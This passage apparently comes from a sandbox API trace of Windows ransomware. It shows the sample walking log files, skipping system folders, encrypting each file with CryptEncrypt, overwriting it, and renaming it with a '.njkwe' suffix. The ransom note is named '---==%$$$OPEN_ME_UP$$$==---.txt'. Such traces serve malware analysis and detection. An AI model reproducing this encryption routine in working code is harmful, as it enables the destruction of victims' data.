Files (x86)") returned -1 [0066.957] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 94 [0066.957] StrStrIW (lpFirst="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpSrch=".njkwe") returned 0x0 [0066.957] lstrcmpW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.957] lstrcmpW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="taridd") returned -1 [0066.957] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.958] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.958] GetTickCount () returned 0x115121d [0066.958] GetTickCount () returned 0x115121d [0066.958] GetTickCount () returned 0x115121d [0066.958] GetTickCount () returned 0x115121d [0066.958] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.958] GetProcessHeap () returned 0xbe0000 [0066.958] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.958] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.960] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.960] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.960] GetProcessHeap () returned 0xbe0000 [0066.960] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.960] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.960] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.960] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.961] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.961] CloseHandle (hObject=0x428) returned 1 [0066.963] GetProcessHeap () returned 0xbe0000 [0066.963] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.963] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx_r00t_{3sXlE5}.njkwe") returned 114 [0066.963] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.963] GetProcessHeap () returned 0xbe0000 [0066.963] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.963] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c9b1b6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9c9b1b6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cAlternateFileName="MI7771~1.EVT")) returned 1 [0066.964] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="Windows") returned -1 [0066.964] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="$Recycle.bin") returned 1 [0066.964] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="System Volume Information") returned -1 [0066.964] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="Program Files") returned -1 [0066.964] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="Program Files (x86)") returned -1 [0066.964] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 84 [0066.964] StrStrIW (lpFirst="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpSrch=".njkwe") returned 0x0 [0066.964] lstrcmpW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.964] lstrcmpW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="taridd") returned -1 [0066.964] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.964] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.967] GetTickCount () returned 0x115122d [0066.967] GetTickCount () returned 0x115122d [0066.967] GetTickCount () returned 0x115122d [0066.967] GetTickCount () returned 0x115122d [0066.967] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.967] GetProcessHeap () returned 0xbe0000 [0066.967] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.967] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.970] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.970] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.970] GetProcessHeap () returned 0xbe0000 [0066.970] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.970] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.970] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.972] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.972] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.972] CloseHandle (hObject=0x428) returned 1 [0067.084] GetProcessHeap () returned 0xbe0000 [0067.084] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.084] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx_r00t_{3sXlE5}.njkwe") returned 104 [0067.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0067.084] GetProcessHeap () returned 0xbe0000 [0067.084] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.084] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9df26e9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9df26e9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cAlternateFileName="MI4667~1.EVT")) returned 1 [0067.085] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="Windows") returned -1 [0067.085] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="$Recycle.bin") returned 1 [0067.085] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="System Volume Information") returned -1 [0067.085] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="Program Files") returned -1 [0067.085] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="Program Files (x86)") returned -1 [0067.085] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 69 [0067.085] StrStrIW (lpFirst="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpSrch=".njkwe") returned 0x0 [0067.085] lstrcmpW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.085] lstrcmpW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="taridd") returned -1 [0067.085] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.085] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.085] GetTickCount () returned 0x115129a [0067.085] GetTickCount () returned 0x115129a [0067.085] GetTickCount () returned 0x115129a [0067.085] GetTickCount () returned 0x115129a [0067.085] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0067.085] GetProcessHeap () returned 0xbe0000 [0067.085] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0067.085] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.088] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.088] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.088] GetProcessHeap () returned 0xbe0000 [0067.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0067.088] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.088] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0067.088] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0067.089] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0067.089] CloseHandle (hObject=0x428) returned 1 [0067.091] GetProcessHeap () returned 0xbe0000 [0067.091] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.091] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx_r00t_{3sXlE5}.njkwe") returned 89 [0067.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0067.091] GetProcessHeap () returned 0xbe0000 [0067.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.091] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Winlogon%4Operational.evtx", cAlternateFileName="MID6AB~1.EVT")) returned 1 [0067.091] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="Windows") returned -1 [0067.091] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0067.091] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="System Volume Information") returned -1 [0067.091] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="Program Files") returned -1 [0067.091] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0067.091] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 56 [0067.091] StrStrIW (lpFirst="Microsoft-Windows-Winlogon%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0067.091] lstrcmpW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.092] lstrcmpW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="taridd") returned -1 [0067.092] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.092] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.092] GetTickCount () returned 0x11512aa [0067.092] GetTickCount () returned 0x11512aa [0067.092] GetTickCount () returned 0x11512aa [0067.092] GetTickCount () returned 0x11512aa [0067.092] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0067.092] GetProcessHeap () returned 0xbe0000 [0067.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0067.092] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.094] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.094] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.094] GetProcessHeap () returned 0xbe0000 [0067.094] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0067.094] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.094] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0067.094] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0067.094] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0067.095] CloseHandle (hObject=0x428) returned 1 [0067.096] GetProcessHeap () returned 0xbe0000 [0067.096] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.096] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 76 [0067.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0067.097] GetProcessHeap () returned 0xbe0000 [0067.097] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.097] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf164b9b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcf164b9b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-WMI-Activity%4Operational.evtx", cAlternateFileName="MIFF83~1.EVT")) returned 1 [0067.097] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="Windows") returned -1 [0067.097] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0067.097] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="System Volume Information") returned -1 [0067.097] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="Program Files") returned -1 [0067.097] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0067.097] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 60 [0067.097] StrStrIW (lpFirst="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0067.097] lstrcmpW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.097] lstrcmpW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="taridd") returned -1 [0067.097] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.097] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.097] GetTickCount () returned 0x11512aa [0067.097] GetTickCount () returned 0x11512aa [0067.097] GetTickCount () returned 0x11512aa [0067.098] GetTickCount () returned 0x11512aa [0067.098] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0067.098] GetProcessHeap () returned 0xbe0000 [0067.098] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0067.098] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.100] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.100] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0067.100] GetProcessHeap () returned 0xbe0000 [0067.100] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0067.100] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.100] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: 